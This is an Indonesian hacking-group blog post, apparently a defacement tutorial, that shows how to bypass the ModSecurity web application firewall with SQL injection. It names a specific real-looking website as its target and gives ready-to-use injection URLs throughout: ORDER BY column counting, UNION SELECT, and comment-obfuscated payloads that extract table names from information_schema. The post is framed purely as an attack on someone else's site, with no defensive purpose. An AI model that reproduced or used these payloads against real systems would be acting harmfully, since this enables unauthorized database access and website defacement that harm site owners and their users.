Bypass WAF (Mod_Security)

Pada siang kali ini kami Team Maikat Tersakiti akan ngepost teknik deface teknik ini sudah lama di gunakan tetapi saya tetap akan membagikan teknik ini untuk yang belum tau teknik ini sangat mudah di lakukan langsung ke TKP
Bahan-Bahan.
Kopi susu dingin
makan ringan
langsung ke tutorial.
Kali ini saya akan membahas tutorial mengenai Bypass WAF (Mod_Security) , nah langsung aja bagi yang ingin belajar langsung ikutin tutorial dibawah :

1. Contoh target

http://www.harshstones.com/product-detail.php?id=35

2. Sekarang kita cari jumlah table databasenya dengan perintah " Order by "

http://www.harshstones.com/product-detail.php?id=35 order by 1-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 2-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 6-- Normal

http://www.harshstones.com/product-detail.php?id=35 order by 12-- Normal 

http://www.harshstones.com/product-detail.php?id=35 order by 13-- Error

Berarti jumlah table databasenya adalah 12

3. Sekarang kita cari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan perintah " union select ".
Sekarang kita jalankan perintahnya

http://www.harshstones.com/product-detail.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12--

4. Sekarang kita bypass dengan perintah :

/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+

5. Sekarang kita coba dengan site diatas :

http://www.harshstones.com/product-detail.php?id=-35/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12--

Sekian artikel yang bisa saya sampaikan kurang jelas komen atau join ke grub kami di sini